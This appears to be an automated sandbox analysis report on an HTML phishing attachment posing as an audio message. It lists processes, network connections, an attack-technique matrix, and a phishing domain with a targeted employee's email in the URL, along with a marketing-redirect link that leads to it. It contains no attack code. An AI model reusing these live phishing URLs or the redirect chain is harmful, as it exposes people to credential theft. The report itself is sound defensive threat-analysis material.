          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49823 version: TLS 1.2

          System Summary

          barindex
          Source: Name includes: Play_NewMessage_17Jan2024_Audio.htmInitial sample: play
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_1076_1580788904Jump to behavior
          Source: classification engineClassification label: mal76.phis.evad.winHTM@33/14@30/16
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play_NewMessage_17Jan2024_Audio.htm
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2020,i,7882445477630509628,3060162036037396328,262144 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2020,i,7882445477630509628,3060162036037396328,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Data Obfuscation

          barindex
          Source: https://2r1.nhvw4is.ru/#Lkmoran@moog.comHTTP Parser: https://2r1.nhvw4is.ru/#Lkmoran@moog.com
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
          Valid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
          Non-Application Layer Protocol
          SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
          Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration5
          Application Layer Protocol
          Data Encrypted for ImpactDNS ServerEmail Addresses
          Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication3
          Ingress Tool Transfer
          Data DestructionVirtual Private ServerEmployee Names
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://2r1.nhvw4is.ru/#Lkmoran@moog.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
          https://2r1.nhvw4is.ru/0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6r1OvgEPyH9fqusm1kFxOY9HI7jFC/2GXuLuN6KqlYKs49PJP4M0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6kdJWQxCSur7B561nIxE0tXq/7hO4txYoEI6eUd0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6ei9bANZ0chH/5yGHYxSRxnr32lWFLaZnuzyZ2fRMM0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6l64ynJdPgQDe/8BAggoRS3IGfgVQWqQrsKqAmU0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6MipOpOZrol77bJu4Jez1PxICsw/2eVSshKvifDU0%Avira URL Cloudsafe
          https://cascade-madmimi-com.translate.goog/logos/0028/7193/logox_0.png?EmnBtwANKGaTAXRVsmKicbCmMa0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/0wNwOpkNampQzdEFzER0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/632Jy30VDgVHr39mjZbPAQ/3u0Xn2q2wkzfexbzQNTGlXRdtH0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/3tDjnOJo1wyWZPuEmK2mWIfU0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6RUb6zvmV0n/6rUQnzSbGLvo0%Avira URL Cloudsafe
          file:///C:/Users/user/Desktop/Play_NewMessage_17Jan2024_Audio.htm0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6YvderOtk6O0M7sgzYT/1TKDqCvavBzEg6KKXO0%Avira URL Cloudsafe
          https://2r1.nhvw4is.ru/favicon.ico0%Avira URL Cloudsafe
          https://aadcdn.msauthimages.net/dbd5a2dd-ycck-qdgvaobjxiczh0sbj8queqtpxrg5wachki5wdu/logintenantbranding/0/bannerlogo?ts=6364082655398909630%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          cascade-madmimi-com.translate.goog
          142.251.40.161
          truefalse
            unknown
            jsdelivr.map.fastly.net
            151.101.193.229
            truefalse
              unknown
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                accounts.google.com
                172.253.122.84
                truefalse
                  high
                  challenges.cloudflare.com
                  104.17.3.184
                  truefalse
                    high
                    www.google.com
                    142.251.40.196
                    truefalse
                      high
                      clients.l.google.com
                      142.250.65.238
                      truefalse
                        high
                        2r1.nhvw4is.ru
                        172.67.148.131
                        truetrue
                          unknown
                          cs1025.wpc.upsiloncdn.net
                          152.199.4.73
                          truefalse
                            unknown
                            aadcdn.msauthimages.net
                            unknown
                            unknownfalse
                              unknown
                              clients1.google.com
                              unknown
                              unknownfalse
                                high
                                clients2.google.com
                                unknown
                                unknownfalse
                                  high
                                  cdn.jsdelivr.net
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6r1OvgEPyH9fqusm1kFxOY9HI7jFC/2GXuLuN6KqlYKs49PJP4Mfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000089B3D0D603false
                                      high
                                      https://2r1.nhvw4is.ru/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=847008825fbf8ce0false
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86false
                                          high
                                          https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6MipOpOZrol77bJu4Jez1PxICsw/2eVSshKvifDUfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8470083bba6a4201/1705509546863/OYQPYviXYsx_AMffalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8470083bba6a4201false
                                              high
                                              https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                high
                                                https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                                  high
                                                  https://cascade-madmimi-com.translate.goog/logos/0028/7193/logox_0.png?EmnBtwANKGaTAXRVsmKicbCmMafalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v3?s=9GwSSkYMo178kButyz32jlFvXFXyc0jsaLG9pP6Vz2pv4%2Fb4cKwYHKz0wzJsq4kWAUVGpYZGM%2B87tChGA2CdA1Hyh9K1k0XQHGEr8O2%2BVf51ENqSMJGcR7LkNOj4M43CtQ%3D%3Dfalse
                                                    high
                                                    https://aadcdn.msauthimages.net/dbd5a2dd-ycck-qdgvaobjxiczh0sbj8queqtpxrg5wachki5wdu/logintenantbranding/0/bannerlogo?ts=636408265539890963false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/847008825fbf8ce0/1705509558147/42cd1f2bd49e95087981761b7cf53c90b1554ff299170fbe1e6299d6d5f703db/VKvcEsHybHjFSnEfalse
                                                      high
                                                      https://2r1.nhvw4is.ru/0wNwOpkNampQzdEFzERfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6ei9bANZ0chH/5yGHYxSRxnr32lWFLaZnuzyZ2fRMMfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6kdJWQxCSur7B561nIxE0tXq/7hO4txYoEI6eUdfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/632Jy30VDgVHr39mjZbPAQ/3u0Xn2q2wkzfexbzQNTGlXRdtHfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6l64ynJdPgQDe/8BAggoRS3IGfgVQWqQrsKqAmUfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://2r1.nhvw4is.ru/#Lkmoran@moog.comtrue
                                                      • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                                      unknown
                                                      https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/3tDjnOJo1wyWZPuEmK2mWIfUfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://challenges.cloudflare.com/turnstile/v0/b/c8377512/api.jsfalse
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normalfalse
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1672084046:1705509045:1KRCh9wlmdHNe1_uWjab1xjgCNY1yb1dMySJtbe4upc/8470083bba6a4201/20178212f2891c9false
                                                            high
                                                            https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.cssfalse
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                                high
                                                                https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6RUb6zvmV0n/6rUQnzSbGLvofalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tfalse
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/847008825fbf8ce0/1705509558146/ATHlue7vcGlmiy5false
                                                                    high
                                                                    https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                                                                      high
                                                                      https://2r1.nhvw4is.ru/favicon.icofalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6YvderOtk6O0M7sgzYT/1TKDqCvavBzEg6KKXOfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      file:///C:/Users/user/Desktop/Play_NewMessage_17Jan2024_Audio.htmtrue
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normalfalse
                                                                        high
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8470083bba6a4201/1705509546867/1ec3802d3c0fe85725e4418799a952df871d31a0bb5d01c39c101922f073ad92/rFQtMclzeP7ExH9false
                                                                          high
                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_93.2.drfalse
                                                                            high
                                                                            https://getbootstrap.com/)chromecache_93.2.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              142.250.65.193
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              151.101.193.229
                                                                              jsdelivr.map.fastly.netUnited States
                                                                              54113FASTLYUSfalse
                                                                              152.199.4.73
                                                                              cs1025.wpc.upsiloncdn.netUnited States
                                                                              15133EDGECASTUSfalse
                                                                              172.253.122.84
                                                                              accounts.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              172.67.148.131
                                                                              2r1.nhvw4is.ruUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              104.17.3.184
                                                                              challenges.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              142.250.81.238
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              142.250.65.238
                                                                              clients.l.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              142.251.40.161
                                                                              cascade-madmimi-com.translate.googUnited States
                                                                              15169GOOGLEUSfalse
                                                                              142.251.40.196
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              35.190.80.1
                                                                              a.nel.cloudflare.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              104.17.2.184
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.16
                                                                              192.168.2.4
                                                                              192.168.2.6
                                                                              Joe Sandbox version:38.0.0 Ammolite
                                                                              Analysis ID:1376210
                                                                              Start date and time:2024-01-17 17:38:07 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 5m 55s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:7
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Play_NewMessage_17Jan2024_Audio.htm
                                                                              Detection:MAL
                                                                              Classification:mal76.phis.evad.winHTM@33/14@30/16
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .htm
                                                                              • Browse: https://tap-rt-prod1-t.campaign.adobe.com/r/?id=h9ecb88b,c1e96b3,69fe0fb&p1=2r1.nhvw4is.ru%2F%23Lkmoran@moog.com
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 142.250.81.227, 34.104.35.123, 34.248.43.205, 142.250.81.234, 142.251.41.10, 142.251.35.170, 142.251.40.106, 142.251.40.234, 142.251.40.138, 142.251.40.170, 142.250.64.74, 142.250.72.106, 142.250.176.202, 142.250.80.74, 142.251.32.106, 142.251.40.202, 142.250.65.170, 142.250.80.42, 142.250.80.106, 69.164.46.0, 192.229.211.108, 142.250.65.234, 172.217.165.138, 142.250.65.202, 142.250.80.3
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, update.googleapis.com, tap-rt-prod1-t.campaign.adobe.com, tap-rt-prod1-lb.campaign.adobe.com, optimizationguide-pa.googleapis.com
                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • VT rate limit hit for: Play_NewMessage_17Jan2024_Audio.htm
                                                                              No simulations
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              151.101.193.229https://analytics.twitter.com/mob_idsync_click?slug=nNfrFvUpha&idb=AAAAEIBAfT5cbgMcoTdYhx-S-W-f01r77JPUrHETZcGwIsRosLosMe91YjU9N0SPut8idcVF8nP0zmw7fBIm9LVn0mElBiKUjRdd8y4eq9u14j7kCswiJfcifUyTx8vjy4I69JG_EtaHDlo7LvmK3yK_JT47RIkhBkW9XkFeaN1FnYA1PzKu44EkVfphq1Kw2m6SQqjIsFqSR2NVis6P6tNRHA4Q3XeO5nmkmHZvxai-hxBBaWJ_n7-wE_w5D-15RwZPC1Tz836L5eeeVn0FLFif0w&ad_tracking=true&tailored_ads=trueGet hashmaliciousHTMLPhisherBrowse
                                                                                https://sites.google.com/view/action-resources/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                  http://ovmoa.orgGet hashmaliciousPorn ScamBrowse
                                                                                    vRecording__57seconds__lntinfotech6437601.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      https://2fo.ozk6fqs.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                        Confirmation Attached.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                          https://googleads.g.doubleclick.net/pcs/click?xai=AKAOjsuLaMSxRbnmx4CaSYBD7UEX1peDpNeYnMWW4dVza-G52TGjr2vj5pKsC0MnZ5wKKbv48DTu4_9zifCV__nn-40JMtKyE_J-VMT8wv7a1Lf0nNBgkN5ubnqB_fbDSNDoYvSXrEeZ7mt6jhn1Gl78NJ_xm24v553oIbpIcOlySTxRzwS3ROTWKkuLKGhJpg1kkeB-2p7L0D_C0Tx_5HYnjwuOs8n8jzqBq4O3iSh2WW3Es8m8o5Fm3xTlO9UbT5wj7XWQmwefhVbuqmrnfemDwqzjrWGaSNRRqB_R9QTXSQjdFDdWTx0_Oo7RzbAWcjKqQR2JbLAW_ZYkDd6cz8q8BYpJJzzkZ6QKuyXH_CCgkPoul09CafKLox9uieqQMwQ&sai=AMfl-YQSMSxmTEvfKP4k3QH0IYz2PIsK1wo62PVWE2-bo7ZdB4Yue3XhmrRw5NnkQ1uiDEixQcvMUgBuCbvmwfqOzcwUGUmidc9tgXXMjS8Z7zb-8rHzyMziFnJ7Kv7S6gwBuwmLhiK3qougMvlVE4DWmw&sig=Cg0ArKJSzCxoV_8QjjEU&fbs_aeid=%5Bgw_fbsaeid%5D&adurl=https://dubaieventhost.com?26utm_source%3Dacuityads%26utm_medium%3Ddisplay%26utm_campaign%3D23%26utm_content%3D728x90_CyberWeek%26utm_term%3DNOOFR%26dclid%3D%25edclid!Get hashmaliciousUnknownBrowse
                                                                                            https://prezi.com/i/7zyo60qgyymr/Get hashmaliciousHTMLPhisherBrowse
                                                                                              https://d2-d7j04.eu1.hubspotlinks.com/Ctc/2N+113/d2-D7j04/MWWYTt5r4sNW32YxhD1TbJDJW3mxgk358lJ2BN4xH9dl3m2ndW6N1vHY6lZ3m3W66fnLs3LLYk8W74gfcW53cZCXW6wgLTk8kF42rW8wsQZM4t-GV4W5Qc7nw3MkfTkW2pBGV754QLSTW6h3n8V48rzB6N8Gf9MJKbNhqW352xxk4F2L28W2MvPXf3x5Dq5W2lM50W5qF01zW82V4v71q-3mKW92ZRmc4RJdxVW5nXbl18hQnlMW98mk0L7xfcxgW5c-jDJ2c0Fc6VLWXcs3CD8PJW857csp55FM5JVBvGfj7XxxsJW2ml1WY52LK2BN8607QMSkJcfW3H5d771dqxwHf5fkHSP04Get hashmaliciousUnknownBrowse
                                                                                                http://url3948.rickhansen.com/ls/click?upn=mt-2BpP9XKXFpxyT-2BZ8LvZwhP2KGeLZ9ZHoGM7uEXarEHM-2F4pH7vF2AroIc8w3vogP7DCA23QFNJ-2FS5tN-2Boa7BLH6SFVy7yF-2FVVVe5ikUK79Un8TU-2BZEFJGaplFzK-2FxyWqS4KvVOjdYJwOmiJt4ruIx8u4WomIrwyj2GGANB3v-2BFU-3Dj7nI_BgO-2FprwtGDPWtmrD4vx2xz4oCnshrwZk15-2Bo65e53G8v781drlMU7eZysSj-2F2IkpdVlaNqXHBqo9jNpHNdlchXOSi4ldDUQd8zIkjqZSyOTOe8KQT-2Bg5bnI6I85b7QbMLnYqxsXkIfeAVS9G7v4rJL-2FoQxwfoJUD2Tlfkr7AnfSLwyl6Iy7ZVSAweeaPjBRhgfbxmEeOMLu5EMv825k9Gw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                  https://2024-a829ac.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                    https://www.dropbox.com/scl/fi/wmbzlyc79fd9mf0wjjxgd/Campaert-Home-3383843-NO-FILE-6-SOA-01.02.2024.pdfD3-132.pdf?rlkey=09ktx0m4tgynzi31ffara2dlb&dl=0Get hashmaliciousUnknownBrowse
                                                                                                      http://levels.fyiGet hashmaliciousHTMLPhisherBrowse
                                                                                                        https://r20.rs6.net/tn.jsp?f=001xf2gldFlTem41gOlcWcMlefLkPrBA_QC49zgWJj0kNBgjxgvySpHX1k29GIQ7nBh4gtZM_hTvMFyPOx3XgRQDGWJFlXziweRbuAGeNnE6TIckwQBTljZjCqNGipjsqnsoFb7eDxExL-0UURxtg4z6fl-0zTi7G0ZNPIVenbV0mA=&c=&__=dmVyYnJhZWNrZW4uZWxzQGRlbWUtZ3JvdXAuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                          https://captcha-1002394581-dev-ed.develop.my.salesforce-sites.com/?isdtp=mn&captcha10023851Get hashmaliciousUnknownBrowse
                                                                                                            https://hyperfollow.com/peoplecomplaintssupportpageGet hashmaliciousUnknownBrowse
                                                                                                              https://tinyurl.com/ytc6dxabGet hashmaliciousPorn ScamBrowse
                                                                                                                https://click.e.berlitz.com/?qs=0e6b3a6ce0a34eb7973094c721dae2442940118341f6513204a5ddb76446816b05daee995a6f52579e9836b91afc4782fe5b268da8179778309b226517d36e97Get hashmaliciousUnknownBrowse
                                                                                                                  http://email.technologycurrent.co/c/eJxsjz2SpSAYAE-jIQUfCBIYzM--a0whovhUUEBBT781G2_UQXfSQ9dIgwVvatMRgZlogbO2th0ZtQHeCi01MTCABNYIBv3IW0LU0NZzBxgYJlhizhhuEUHNBwX8zcTnH_H1Kb5YxXAy2jq_-unWZwjGJaR9vXY2pb2iHxW8KniloPSC_lf-evoqaa3oN-XLNERQx9KObIorluQwasileU4_5GHEjj-pbxplZwrKyOsQqpQS1kmYcLVZ4tIwzNx1OBN324yDjLfc15yjb24RCJmCS8vqr-egpdVZRRie3cl7GdV7fuRht94u-bQSn-sphUprnIV_y-O2wfVz3q0KCo_8mN1M8Xu5bji3t6dkyBVwM9vfjXhltuJzeEtzenWWfge1U9MufrEpu1OO-qyA__zEtO0V_Y78MTutt45zLoBgXodu65WbTEgVw7sKRas4O4-03-rUFRT5nTFGcDwHKhP1E_kHgtEc4QKP2ph4QI2BXiEi9PE3AAD__wvcq4IGet hashmaliciousUnknownBrowse
                                                                                                                    https://free-pdf-pro.comGet hashmaliciousUnknownBrowse
                                                                                                                      152.199.4.73vRecording__57secs__AUD-olgoonik_VM#33033303.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        https://h1xhw4w4rh.adosierthy.tech/?email=a3JhbW9zQG5jY29tbXVuaXR5Y29sbGVnZXMuZWR1Get hashmaliciousHTMLPhisherBrowse
